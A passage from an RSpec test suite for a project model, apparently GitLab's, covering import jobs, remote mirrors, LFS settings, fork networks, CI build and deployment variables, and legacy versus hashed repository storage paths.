expect { mirror.import_finish }.to change { mirror.import_error }.from(error_message).to(nil)
end
it 'performs housekeeping when an import of a fresh project is completed' do
project = create(:project_empty_repo, :import_started, import_type: :github)
project.import_finish
expect(after_import_service).to have_received(:execute)
expect(housekeeping_service).to have_received(:execute)
end
it 'does not perform housekeeping when project repository does not exist' do
project = create(:project, :import_started, import_type: :github)
project.import_finish
expect(housekeeping_service).not_to have_received(:execute)
end
it 'does not perform housekeeping when project does not have a valid import type' do
project = create(:project, :import_started, import_type: nil)
project.import_finish
expect(housekeeping_service).not_to have_received(:execute)
end
end
end
describe '#latest_successful_builds_for' do
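# Helpers below create successful pipelines on the default branch and artifact-bearing builds on them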
def create_pipeline(status = 'success')
create(:ci_pipeline, project: project,
sha: project.commit.sha,
ref: project.default_branch,
status: status)
end
def create_build(new_pipeline = pipeline, name = 'test')
create(:ci_build, :success, :artifacts,
pipeline: new_pipeline,
status: new_pipeline.status,
name: name)
end
let(:project) { create(:project, :repository) }
let(:pipeline) { create_pipeline }
context 'with many builds' do
it 'gives the latest builds from latest pipeline' do
pipeline1 = create_pipeline
pipeline2 = create_pipeline
build1_p2 = create_build(pipeline2, 'test')
create_build(pipeline1, 'test')
create_build(pipeline1, 'test2')
build2_p2 = create_build(pipeline2, 'test2')
latest_builds = project.latest_successful_builds_for
expect(latest_builds).to contain_exactly(build2_p2, build1_p2)
end
end
context 'with succeeded pipeline' do
let!(:build) { create_build }
context 'standalone pipeline' do
it 'returns builds for ref for default_branch' do
builds = project.latest_successful_builds_for
expect(builds).to contain_exactly(build)
end
it 'returns empty relation if the build cannot be found' do
builds = project.latest_successful_builds_for('TAIL')
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
context 'with some pending pipeline' do
before do
create_build(create_pipeline('pending'))
end
it 'gives the latest build from latest pipeline' do
latest_build = project.latest_successful_builds_for
expect(latest_build).to contain_exactly(build)
end
end
end
context 'with pending pipeline' do
before do
pipeline.update(status: 'pending')
create_build(pipeline)
end
it 'returns empty relation' do
builds = project.latest_successful_builds_for
expect(builds).to be_kind_of(ActiveRecord::Relation)
expect(builds).to be_empty
end
end
end
describe '#add_import_job' do
let(:import_jid) { '123' }
context 'forked' do
let(:forked_project_link) { create(:forked_project_link, :forked_to_empty_project) }
let(:forked_from_project) { forked_project_link.forked_from_project }
let(:project) { forked_project_link.forked_to_project }
it 'schedules a RepositoryForkWorker job' do
expect(RepositoryForkWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
context 'without mirror' do
it 'returns nil' do
project = create(:project)
expect(project.add_import_job).to be nil
end
end
context 'without repository' do
it 'schedules RepositoryImportWorker' do
project = create(:project, import_url: generate(:url))
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
context 'with mirror' do
it 'schedules RepositoryUpdateMirrorWorker' do
project = create(:project, :mirror, :repository)
expect(RepositoryUpdateMirrorWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
end
context 'not forked' do
it 'schedules a RepositoryImportWorker job' do
project = create(:project, import_url: generate(:url))
expect(RepositoryImportWorker).to receive(:perform_async).with(project.id).and_return(import_jid)
expect(project.add_import_job).to eq(import_jid)
end
end
end
describe '#gitlab_project_import?' do
subject(:project) { build(:project, import_type: 'gitlab_project') }
it { expect(project.gitlab_project_import?).to be true }
end
describe '#gitea_import?' do
subject(:project) { build(:project, import_type: 'gitea') }
it { expect(project.gitea_import?).to be true }
end
describe '#has_remote_mirror?' do
let(:project) { create(:project, :remote_mirror, :import_started) }
subject { project.has_remote_mirror? }
before do
allow_any_instance_of(RemoteMirror).to receive(:refresh_remote)
end
it 'returns true when a remote mirror is enabled' do
is_expected.to be_truthy
end
it 'returns false when remote mirror is disabled' do
project.remote_mirrors.first.update_attributes(enabled: false)
is_expected.to be_falsy
end
end
describe '#update_remote_mirrors' do
let(:project) { create(:project, :remote_mirror, :import_started) }
delegate :update_remote_mirrors, to: :project
before do
allow_any_instance_of(RemoteMirror).to receive(:refresh_remote)
end
it 'syncs enabled remote mirror' do
expect_any_instance_of(RemoteMirror).to receive(:sync)
update_remote_mirrors
end
it 'does nothing when remote mirror is disabled globally and not overridden' do
stub_application_setting(mirror_available: false)
project.remote_mirror_available_overridden = false
expect_any_instance_of(RemoteMirror).not_to receive(:sync)
update_remote_mirrors
end
it 'does not sync disabled remote mirrors' do
project.remote_mirrors.first.update_attributes(enabled: false)
expect_any_instance_of(RemoteMirror).not_to receive(:sync)
update_remote_mirrors
end
end
describe '#remote_mirror_available?' do
let(:project) { create(:project) }
context 'when remote mirror global setting is enabled' do
it 'returns true' do
expect(project.remote_mirror_available?).to be(true)
end
end
context 'when remote mirror global setting is disabled' do
before do
stub_application_setting(mirror_available: false)
end
it 'returns true when overridden' do
project.remote_mirror_available_overridden = true
expect(project.remote_mirror_available?).to be(true)
end
it 'returns false when not overridden' do
expect(project.remote_mirror_available?).to be(false)
end
end
end
describe '#ancestors_upto', :nested_groups do
let(:parent) { create(:group) }
let(:child) { create(:group, parent: parent) }
let(:child2) { create(:group, parent: child) }
let(:project) { create(:project, namespace: child2) }
it 'returns all ancestors when no namespace is given' do
expect(project.ancestors_upto).to contain_exactly(child2, child, parent)
end
it 'includes ancestors up to but excluding the given ancestor' do
expect(project.ancestors_upto(parent)).to contain_exactly(child2, child)
end
end
describe '#lfs_enabled?' do
let(:project) { create(:project) }
shared_examples 'project overrides group' do
it 'returns true when enabled in project' do
project.update_attribute(:lfs_enabled, true)
expect(project.lfs_enabled?).to be_truthy
end
it 'returns false when disabled in project' do
project.update_attribute(:lfs_enabled, false)
expect(project.lfs_enabled?).to be_falsey
end
it 'returns the value from the namespace, when no value is set in project' do
expect(project.lfs_enabled?).to eq(project.namespace.lfs_enabled?)
end
end
context 'LFS disabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, false)
enable_lfs
end
it_behaves_like 'project overrides group'
end
context 'LFS enabled in group' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
enable_lfs
end
it_behaves_like 'project overrides group'
end
describe 'LFS disabled globally' do
shared_examples 'it always returns false' do
it do
expect(project.lfs_enabled?).to be_falsey
expect(project.namespace.lfs_enabled?).to be_falsey
end
end
context 'when no values are set' do
it_behaves_like 'it always returns false'
end
context 'when all values are set to true' do
before do
project.namespace.update_attribute(:lfs_enabled, true)
project.update_attribute(:lfs_enabled, true)
end
it_behaves_like 'it always returns false'
end
end
end
describe '.where_full_path_in' do
context 'without any paths' do
it 'returns an empty relation' do
expect(described_class.where_full_path_in([])).to eq([])
end
end
context 'without any valid paths' do
it 'returns an empty relation' do
expect(described_class.where_full_path_in(%w[foo])).to eq([])
end
end
context 'with valid paths' do
let!(:project1) { create(:project) }
let!(:project2) { create(:project) }
it 'returns the projects matching the paths' do
projects = described_class.where_full_path_in([project1.full_path,
project2.full_path])
expect(projects).to contain_exactly(project1, project2)
end
it 'returns projects regardless of the casing of paths' do
projects = described_class.where_full_path_in([project1.full_path.upcase,
project2.full_path.upcase])
expect(projects).to contain_exactly(project1, project2)
end
end
end
describe '#find_path_lock' do
let(:project) { create :project }
let(:path_lock) { create :path_lock, project: project }
let(:path) { path_lock.path }
it 'returns path_lock' do
expect(project.find_path_lock(path)).to eq(path_lock)
end
it 'returns nil when no lock matches the path' do
expect(project.find_path_lock('app/controllers')).to be_falsey
end
end
describe '#change_repository_storage' do
let(:project) { create(:project, :repository) }
let(:read_only_project) { create(:project, :repository, repository_read_only: true) }
before do
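# Register a temporary 'extra' storage on disk as the transfer target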
FileUtils.mkdir('tmp/tests/extra_storage')
stub_storage_settings('extra' => { 'path' => 'tmp/tests/extra_storage' })
end
after do
FileUtils.rm_rf('tmp/tests/extra_storage')
end
it 'schedules the transfer of the repository to the new storage and locks the project' do
expect(ProjectUpdateRepositoryStorageWorker).to receive(:perform_async).with(project.id, 'extra')
project.change_repository_storage('extra')
project.save
expect(project).to be_repository_read_only
end
it "doesn't schedule the transfer if the repository is already read-only" do
expect(ProjectUpdateRepositoryStorageWorker).not_to receive(:perform_async)
read_only_project.change_repository_storage('extra')
read_only_project.save
end
it "doesn't lock or schedule the transfer if the storage hasn't changed" do
expect(ProjectUpdateRepositoryStorageWorker).not_to receive(:perform_async)
project.change_repository_storage(project.repository_storage)
project.save
expect(project).not_to be_repository_read_only
end
it 'raises an error if an invalid repository storage is provided' do
expect { project.change_repository_storage('unknown') }.to raise_error(ArgumentError)
end
end
describe '#change_head' do
let(:project) { create(:project, :repository) }
it 'returns an error if the branch does not exist' do
expect(project.change_head('unexisted-branch')).to be false
expect(project.errors.size).to eq(1)
end
it 'calls the before_change_head and after_change_head methods' do
expect(project.repository).to receive(:before_change_head)
expect(project.repository).to receive(:after_change_head)
project.change_head(project.default_branch)
end
it 'creates the new reference with rugged' do
expect(project.repository.raw_repository).to receive(:write_ref).with('HEAD', "refs/heads/#{project.default_branch}", shell: false)
project.change_head(project.default_branch)
end
it 'copies the gitattributes' do
expect(project.repository).to receive(:copy_gitattributes).with(project.default_branch)
project.change_head(project.default_branch)
end
it 'reloads the default branch' do
expect(project).to receive(:reload_default_branch)
project.change_head(project.default_branch)
end
end
context 'forks' do
include ProjectForksHelper
let(:project) { create(:project, :public) }
let!(:forked_project) { fork_project(project) }
describe '#fork_network' do
it 'includes a fork of the project' do
expect(project.fork_network.projects).to include(forked_project)
end
it 'includes a fork of a fork' do
other_fork = fork_project(forked_project)
expect(project.fork_network.projects).to include(other_fork)
end
it 'includes sibling forks' do
other_fork = fork_project(project)
expect(forked_project.fork_network.projects).to include(other_fork)
end
it 'includes the base project' do
expect(forked_project.fork_network.projects).to include(project.reload)
end
end
describe '#in_fork_network_of?' do
it 'is true for a real fork' do
expect(forked_project.in_fork_network_of?(project)).to be_truthy
end
it 'is true for a fork of a fork', :postgresql do
other_fork = fork_project(forked_project)
expect(other_fork.in_fork_network_of?(project)).to be_truthy
end
it 'is true for sibling forks' do
sibling = fork_project(project)
expect(sibling.in_fork_network_of?(forked_project)).to be_truthy
end
it 'is false when another project is given' do
other_project = build_stubbed(:project)
expect(forked_project.in_fork_network_of?(other_project)).to be_falsy
end
end
describe '#fork_source' do
let!(:second_fork) { fork_project(forked_project) }
it 'returns the direct source if it exists' do
expect(second_fork.fork_source).to eq(forked_project)
end
it 'returns the root of the fork network when the direct source was deleted' do
forked_project.destroy
expect(second_fork.fork_source).to eq(project)
end
it 'returns nil if it is the root of the fork network' do
expect(project.fork_source).to be_nil
end
end
describe '#lfs_storage_project' do
it 'returns self for non-forks' do
expect(project.lfs_storage_project).to eq project
end
it 'returns the fork network root for forks' do
second_fork = fork_project(forked_project)
expect(second_fork.lfs_storage_project).to eq project
end
it 'returns self when fork_source is nil' do
expect(forked_project).to receive(:fork_source).and_return(nil)
expect(forked_project.lfs_storage_project).to eq forked_project
end
end
describe '#all_lfs_objects' do
let(:lfs_object) { create(:lfs_object) }
before do
project.lfs_objects << lfs_object
end
it 'returns the lfs object for a project' do
expect(project.all_lfs_objects).to contain_exactly(lfs_object)
end
it 'returns the lfs object for a fork' do
expect(forked_project.all_lfs_objects).to contain_exactly(lfs_object)
end
end
end
describe '#pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
context 'without any pushes' do
it 'returns 0' do
expect(project.pushes_since_gc).to eq(0)
end
end
context 'with a number of pushes' do
it 'returns the number of pushes' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
end
describe '#increment_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'increments the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
describe '#repository_and_lfs_size' do
let(:project) { create(:project, :repository) }
let(:size) { 50 }
before do
allow(project.statistics).to receive(:total_repository_size).and_return(size)
end
it 'returns the total repository and lfs size' do
expect(project.repository_and_lfs_size).to eq(size)
end
end
describe '#approver_group_ids=' do
let(:project) { create(:project) }
it 'creates approver_groups' do
group = create :group
group1 = create :group
project.approver_group_ids = "#{group.id}, #{group1.id}"
project.save!
expect(project.approver_groups.map(&:group)).to match_array([group, group1])
end
end
describe '#reset_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'resets the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
project.reset_pushes_since_gc
expect(project.pushes_since_gc).to eq(0)
end
end
describe '#deployment_variables' do
context 'when project has no deployment service' do
let(:project) { create(:project) }
it 'returns an empty array' do
expect(project.deployment_variables).to eq []
end
end
context 'when project has a deployment service' do
shared_examples 'same behavior between KubernetesService and Platform::Kubernetes' do
it 'returns variables from this service' do
expect(project.deployment_variables).to include(
{ key: 'KUBE_TOKEN', value: project.deployment_platform.token, public: false }
)
end
end
context 'when user configured kubernetes from Integration > Kubernetes' do
let(:project) { create(:kubernetes_project) }
it_behaves_like 'same behavior between KubernetesService and Platform::Kubernetes'
end
context 'when user configured kubernetes from CI/CD > Clusters' do
let!(:cluster) { create(:cluster, :project, :provided_by_gcp) }
let(:project) { cluster.project }
it_behaves_like 'same behavior between KubernetesService and Platform::Kubernetes'
end
context 'when multiple clusters (EEP) is enabled' do
before do
stub_licensed_features(multiple_clusters: true)
end
let(:project) { create(:project) }
let!(:default_cluster) do
create(:cluster,
platform_type: :kubernetes,
projects: [project],
environment_scope: '*',
platform_kubernetes: default_cluster_kubernetes)
end
let!(:review_env_cluster) do
create(:cluster,
platform_type: :kubernetes,
projects: [project],
environment_scope: 'review/*',
platform_kubernetes: review_env_cluster_kubernetes)
end
let(:default_cluster_kubernetes) { create(:cluster_platform_kubernetes, token: 'default-AAA') }
let(:review_env_cluster_kubernetes) { create(:cluster_platform_kubernetes, token: 'review-AAA') }
context 'when environment name is review/name' do
let!(:environment) { create(:environment, project: project, name: 'review/name') }
it 'returns variables from this service' do
expect(project.deployment_variables(environment: 'review/name'))
.to include(key: 'KUBE_TOKEN', value: 'review-AAA', public: false)
end
end
context 'when environment name is other' do
let!(:environment) { create(:environment, project: project, name: 'staging/name') }
it 'returns variables from this service' do
expect(project.deployment_variables(environment: 'staging/name'))
.to include(key: 'KUBE_TOKEN', value: 'default-AAA', public: false)
end
end
end
end
end
describe '#secret_variables_for' do
let(:project) { create(:project) }
let!(:secret_variable) do
create(:ci_variable, value: 'secret', project: project)
end
let!(:protected_variable) do
create(:ci_variable, :protected, value: 'protected', project: project)
end
subject { project.reload.secret_variables_for(ref: 'ref') }
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
shared_examples 'ref is protected' do
it 'contains all the variables' do
is_expected.to contain_exactly(secret_variable, protected_variable)
end
end
context 'when the ref is not protected' do
it 'contains only the secret variables' do
is_expected.to contain_exactly(secret_variable)
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive(:protected_for?).with('ref').and_return(true)
end
it_behaves_like 'ref is protected'
end
end
describe '#protected_for?' do
let(:project) { create(:project) }
subject { project.protected_for?('ref') }
context 'when the ref is not protected' do
before do
stub_application_setting(
default_branch_protection: Gitlab::Access::PROTECTION_NONE)
end
it 'returns false' do
is_expected.to be_falsey
end
end
context 'when the ref is a protected branch' do
before do
allow(project).to receive(:repository).and_call_original
allow(project).to receive_message_chain(:repository, :branch_exists?).and_return(true)
create(:protected_branch, name: 'ref', project: project)
end
it 'returns true' do
is_expected.to be_truthy
end
end
context 'when the ref is a protected tag' do
before do
allow(project).to receive_message_chain(:repository, :branch_exists?).and_return(false)
allow(project).to receive_message_chain(:repository, :tag_exists?).and_return(true)
create(:protected_tag, name: 'ref', project: project)
end
it 'returns true' do
is_expected.to be_truthy
end
end
end
describe '#update_project_statistics' do
let(:project) { create(:project) }
it "is called after creation" do
expect(project.statistics).to be_a ProjectStatistics
expect(project.statistics).to be_persisted
end
it "copies the namespace_id" do
expect(project.statistics.namespace_id).to eq project.namespace_id
end
it "updates the namespace_id when changed" do
namespace = create(:namespace)
project.update(namespace: namespace)
expect(project.statistics.namespace_id).to eq namespace.id
end
end
describe '#create_import_state' do
it 'is called after save' do
project = create(:project)
expect(project).to receive(:create_import_state)
project.update(mirror: true, mirror_user: project.owner, import_url: 'http://foo.com')
end
end
describe 'inside_path' do
let!(:project1) { create(:project, namespace: create(:namespace, path: 'name_pace')) }
let!(:project2) { create(:project) }
let!(:project3) { create(:project, namespace: create(:namespace, path: 'namespace')) }
let!(:path) { project1.namespace.full_path }
it 'returns correct project' do
expect(described_class.inside_path(path)).to eq([project1])
end
end
describe '#route_map_for' do
let(:project) { create(:project, :repository) }
let(:route_map) do
<<-MAP.strip_heredoc
- source: /source/(.*)/
public: '\\1'
MAP
end
before do
project.repository.create_file(User.last, '.gitlab/route-map.yml', route_map, message: 'Add .gitlab/route-map.yml', branch_name: 'master')
end
context 'when there is a .gitlab/route-map.yml at the commit' do
context 'when the route map is valid' do
it 'returns a route map' do
map = project.route_map_for(project.commit.sha)
expect(map).to be_a_kind_of(Gitlab::RouteMap)
end
end
context 'when the route map is invalid' do
let(:route_map) { 'INVALID' }
it 'returns nil' do
expect(project.route_map_for(project.commit.sha)).to be_nil
end
end
end
context 'when there is no .gitlab/route-map.yml at the commit' do
it 'returns nil' do
expect(project.route_map_for(project.commit.parent.sha)).to be_nil
end
end
end
describe '#public_path_for_source_path' do
let(:project) { create(:project, :repository) }
let(:route_map) do
Gitlab::RouteMap.new(<<-MAP.strip_heredoc)
- source: /source/(.*)/
public: '\\1'
MAP
end
let(:sha) { project.commit.id }
context 'when there is a route map' do
before do
allow(project).to receive(:route_map_for).with(sha).and_return(route_map)
end
context 'when the source path is mapped' do
it 'returns the public path' do
expect(project.public_path_for_source_path('source/file.html', sha)).to eq('file.html')
end
end
context 'when the source path is not mapped' do
it 'returns nil' do
expect(project.public_path_for_source_path('file.html', sha)).to be_nil
end
end
end
context 'when there is no route map' do
before do
allow(project).to receive(:route_map_for).with(sha).and_return(nil)
end
it 'returns nil' do
expect(project.public_path_for_source_path('source/file.html', sha)).to be_nil
end
end
end
describe '#parent' do
let(:project) { create(:project) }
it { expect(project.parent).to eq(project.namespace) }
end
describe '#parent_id' do
let(:project) { create(:project) }
it { expect(project.parent_id).to eq(project.namespace_id) }
end
describe '#parent_changed?' do
let(:project) { create(:project) }
before do
project.namespace_id = 7
end
it { expect(project.parent_changed?).to be_truthy }
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
describe '#pages_url' do
let(:group) { create(:group, name: 'Group') }
let(:nested_group) { create(:group, parent: group) }
let(:domain) { 'Example.com' }
subject { project.pages_url }
before do
allow(Settings.pages).to receive(:host).and_return(domain)
allow(Gitlab.config.pages).to receive(:url).and_return('http://example.com')
end
context 'top-level group' do
let(:project) { create(:project, namespace: group, name: project_name) }
context 'group page' do
let(:project_name) { 'group.example.com' }
it { is_expected.to eq("http://group.example.com") }
end
context 'project page' do
let(:project_name) { 'Project' }
it { is_expected.to eq("http://group.example.com/project") }
end
end
context 'nested group' do
let(:project) { create(:project, namespace: nested_group, name: project_name) }
let(:expected_url) { "http://group.example.com/#{nested_group.path}/#{project.path}" }
context 'group page' do
let(:project_name) { 'group.example.com' }
it { is_expected.to eq(expected_url) }
end
context 'project page' do
let(:project_name) { 'Project' }
it { is_expected.to eq(expected_url) }
end
end
end
describe '#http_url_to_repo' do
let(:project) { create(:project) }
it 'returns the url to the repo without a username' do
expect(project.http_url_to_repo).to eq("#{project.web_url}.git")
expect(project.http_url_to_repo).not_to include('@')
end
end
describe '#pipeline_status' do
let(:project) { create(:project, :repository) }
it 'builds a pipeline status' do
expect(project.pipeline_status).to be_a(Gitlab::Cache::Ci::ProjectPipelineStatus)
end
it 'has a loaded pipeline status' do
expect(project.pipeline_status).to be_loaded
end
end
describe '#append_or_update_attribute' do
let(:project) { create(:project) }
it 'shows full error updating an invalid MR' do
error_message = 'Failed to replace merge_requests because one or more of the new records could not be saved.'\
' Validate fork Source project is not a fork of the target project'
expect { project.append_or_update_attribute(:merge_requests, [create(:merge_request)]) }
.to raise_error(ActiveRecord::RecordNotSaved, error_message)
end
it 'updates the project successfully' do
merge_request = create(:merge_request, target_project: project, source_project: project)
expect { project.append_or_update_attribute(:merge_requests, [merge_request]) }
.not_to raise_error
end
end
describe '#last_repository_updated_at' do
it 'sets to created_at upon creation' do
project = create(:project, created_at: 2.hours.ago)
expect(project.last_repository_updated_at.to_i).to eq(project.created_at.to_i)
end
end
describe '.public_or_visible_to_user' do
let!(:user) { create(:user) }
let!(:private_project) do
create(:project, :private, creator: user, namespace: user.namespace)
end
let!(:public_project) { create(:project, :public) }
context 'with a user' do
let(:projects) do
described_class.all.public_or_visible_to_user(user)
end
it 'includes projects the user has access to' do
expect(projects).to include(private_project)
end
it 'includes projects the user can see' do
expect(projects).to include(public_project)
end
end
context 'without a user' do
it 'only includes public projects' do
projects = described_class.all.public_or_visible_to_user
expect(projects).to eq([public_project])
end
end
end
describe '#pages_available?' do
let(:project) { create(:project, group: group) }
subject { project.pages_available? }
before do
allow(Gitlab.config.pages).to receive(:enabled).and_return(true)
end
context 'when the project is in a top level namespace' do
let(:group) { create(:group) }
it { is_expected.to be(true) }
end
context 'when the project is in a subgroup' do
let(:group) { create(:group, :nested) }
it { is_expected.to be(false) }
end
end
describe '#remove_private_deploy_keys' do
let!(:project) { create(:project) }
context 'for a private deploy key' do
let!(:key) { create(:deploy_key, public: false) }
let!(:deploy_keys_project) { create(:deploy_keys_project, deploy_key: key, project: project) }
context 'when the key is not linked to another project' do
it 'removes the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).not_to include(key)
end
end
context 'when the key is linked to another project' do
before do
another_project = create(:project)
create(:deploy_keys_project, deploy_key: key, project: another_project)
end
it 'does not remove the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).to include(key)
end
end
end
context 'for a public deploy key' do
let!(:key) { create(:deploy_key, public: true) }
let!(:deploy_keys_project) { create(:deploy_keys_project, deploy_key: key, project: project) }
it 'does not remove the key' do
project.remove_private_deploy_keys
expect(project.deploy_keys).to include(key)
end
end
end
describe '#remove_pages' do
let(:project) { create(:project) }
let(:namespace) { project.namespace }
let(:pages_path) { project.pages_path }
around do |example|
FileUtils.mkdir_p(pages_path)
begin
example.run
ensure
FileUtils.rm_rf(pages_path)
end
end
it 'removes the pages directory' do
expect_any_instance_of(Projects::UpdatePagesConfigurationService).to receive(:execute)
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project).and_return(true)
expect(PagesWorker).to receive(:perform_in).with(5.minutes, :remove, namespace.full_path, anything)
project.remove_pages
end
it 'is a no-op when there is no namespace' do
project.namespace.delete
project.reload
expect_any_instance_of(Projects::UpdatePagesConfigurationService).not_to receive(:execute)
expect_any_instance_of(Gitlab::PagesTransfer).not_to receive(:rename_project)
project.remove_pages
end
it 'is run when the project is destroyed' do
expect(project).to receive(:remove_pages).and_call_original
project.destroy
end
end
describe '#remove_export' do
let(:legacy_project) { create(:project, :legacy_storage, :with_export) }
let(:project) { create(:project, :with_export) }
it 'removes the exports directory for the project' do
expect(File.exist?(project.export_path)).to be_truthy
allow(FileUtils).to receive(:rm_rf).and_call_original
expect(FileUtils).to receive(:rm_rf).with(project.export_path).and_call_original
project.remove_exports
expect(File.exist?(project.export_path)).to be_falsy
end
it 'is a no-op on legacy projects when there is no namespace' do
export_path = legacy_project.export_path
legacy_project.namespace.delete
legacy_project.reload
expect(FileUtils).not_to receive(:rm_rf).with(export_path)
legacy_project.remove_exports
expect(File.exist?(export_path)).to be_truthy
end
it 'runs on hashed storage projects when there is no namespace' do
export_path = project.export_path
project.namespace.delete
project.reload
allow(FileUtils).to receive(:rm_rf).and_call_original
expect(FileUtils).to receive(:rm_rf).with(export_path).and_call_original
project.remove_exports
expect(File.exist?(export_path)).to be_falsy
end
it 'is run when the project is destroyed' do
expect(project).to receive(:remove_exports).and_call_original
project.destroy
end
end
describe '#remove_exported_project_file' do
let(:project) { create(:project, :with_export) }
it 'removes the exported project file' do
exported_file = project.export_project_path
expect(File.exist?(exported_file)).to be_truthy
allow(FileUtils).to receive(:rm_f).and_call_original
expect(FileUtils).to receive(:rm_f).with(exported_file).and_call_original
project.remove_exported_project_file
expect(File.exist?(exported_file)).to be_falsy
end
end
describe '#forks_count' do
it 'returns the number of forks' do
project = build(:project)
expect_any_instance_of(Projects::ForksCountService).to receive(:count).and_return(1)
expect(project.forks_count).to eq(1)
end
end
context 'legacy storage' do
let(:project) { create(:project, :repository, :legacy_storage) }
let(:gitlab_shell) { Gitlab::Shell.new }
let(:project_storage) { project.send(:storage) }
before do
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
end
describe '#base_dir' do
it 'returns base_dir based on namespace only' do
expect(project.base_dir).to eq(project.namespace.full_path)
end
end
describe '#disk_path' do
it 'returns disk_path based on namespace and project path' do
expect(project.disk_path).to eq("#{project.namespace.full_path}/#{project.path}")
end
end
describe '#ensure_storage_path_exists' do
it 'delegates to gitlab_shell to ensure namespace is created' do
expect(gitlab_shell).to receive(:add_namespace).with(project.repository_storage, project.base_dir)
project.ensure_storage_path_exists
end
end
describe '#legacy_storage?' do
it 'returns true when storage_version is nil' do
project = build(:project, storage_version: nil)
expect(project.legacy_storage?).to be_truthy
end
it 'returns true when the storage_version is 0' do
project = build(:project, storage_version: 0)
expect(project.legacy_storage?).to be_truthy
end
end
describe '#hashed_storage?' do
it 'returns false' do
expect(project.hashed_storage?(:repository)).to be_falsey
end
end
describe '#rename_repo' do
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
stub_container_registry_config(enabled: false)
expect(gitlab_shell).to receive(:mv_repository)
.ordered
.with(project.repository_storage, "#{project.namespace.full_path}/foo", "#{project.full_path}")
.and_return(true)
expect(gitlab_shell).to receive(:mv_repository)
.ordered
.with(project.repository_storage, "#{project.namespace.full_path}/foo.wiki", "#{project.full_path}.wiki")
.and_return(true)
expect_any_instance_of(SystemHooksService)
.to receive(:execute_hooks_for)
.with(project, :rename)
expect_any_instance_of(Gitlab::UploadsTransfer)
.to receive(:rename_project)
.with('foo', project.path, project.namespace.full_path)
expect(project).to receive(:expire_caches_before_rename)
expect(project).to receive(:expires_full_path_cache)
project.rename_repo
end
context 'container registry with images' do
let(:container_repository) { create(:container_repository) }
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags(repository: :any, tags: ['tag'])
project.container_repositories << container_repository
end
subject { project.rename_repo }
it { expect { subject }.to raise_error(StandardError) }
end
context 'gitlab pages' do
before do
expect(project_storage).to receive(:rename_repo) { true }
end
it 'moves pages folder to new location' do
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project)
project.rename_repo
end
end
context 'attachments' do
before do
expect(project_storage).to receive(:rename_repo) { true }
end
it 'moves uploads folder to new location' do
expect_any_instance_of(Gitlab::UploadsTransfer).to receive(:rename_project)
project.rename_repo
end
end
it 'updates project full path in .git/config' do
allow(project_storage).to receive(:rename_repo).and_return(true)
project.rename_repo
expect(project.repository.rugged.config['gitlab.fullpath']).to eq(project.full_path)
end
end
describe '#pages_path' do
it 'returns a path where pages are stored' do
expect(project.pages_path).to eq(File.join(Settings.pages.path, project.namespace.full_path, project.path))
end
end
describe '#migrate_to_hashed_storage!' do
it 'returns true' do
expect(project.migrate_to_hashed_storage!).to be_truthy
end
it 'flags as read-only' do
expect { project.migrate_to_hashed_storage! }.to change { project.repository_read_only }.to(true)
end
it 'schedules ProjectMigrateHashedStorageWorker with delayed start when the project repo is in use' do
Gitlab::ReferenceCounter.new(project.gl_repository(is_wiki: false)).increase
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_in)
project.migrate_to_hashed_storage!
end
it 'schedules ProjectMigrateHashedStorageWorker with delayed start when the wiki repo is in use' do
Gitlab::ReferenceCounter.new(project.gl_repository(is_wiki: true)).increase
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_in)
project.migrate_to_hashed_storage!
end
it 'schedules ProjectMigrateHashedStorageWorker' do
expect(ProjectMigrateHashedStorageWorker).to receive(:perform_async).with(project.id)
project.migrate_to_hashed_storage!
end
end
end
context 'hashed storage' do
let(:project) { create(:project, :repository, skip_disk_validation: true) }
let(:gitlab_shell) { Gitlab::Shell.new }
let(:hash) { Digest::SHA2.hexdigest(project.id.to_s) }
let(:hashed_prefix) { File.join('@hashed', hash[0..1], hash[2..3]) }
let(:hashed_path) { File.join(hashed_prefix, hash) }
before do
stub_application_setting(hashed_storage_enabled: true)
end
describe '#legacy_storage?' do
it 'returns false' do
expect(project.legacy_storage?).to be_falsey
end
end
describe '#hashed_storage?' do
it 'returns true if rolled out' do
expect(project.hashed_storage?(:attachments)).to be_truthy
end
it 'returns false when not rolled out yet' do
project.storage_version = 1
expect(project.hashed_storage?(:attachments)).to be_falsey
end
end
describe '#base_dir' do
it 'returns base_dir based on hash of project id' do
expect(project.base_dir).to eq(hashed_prefix)
end
end
describe '#disk_path' do
it 'returns disk_path based on hash of project id' do
expect(project.disk_path).to eq(hashed_path)
end
end
describe '#ensure_storage_path_exists' do
it 'delegates to gitlab_shell to ensure namespace is created' do
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
expect(gitlab_shell).to receive(:add_namespace).with(project.repository_storage, hashed_prefix)
project.ensure_storage_path_exists
end
end
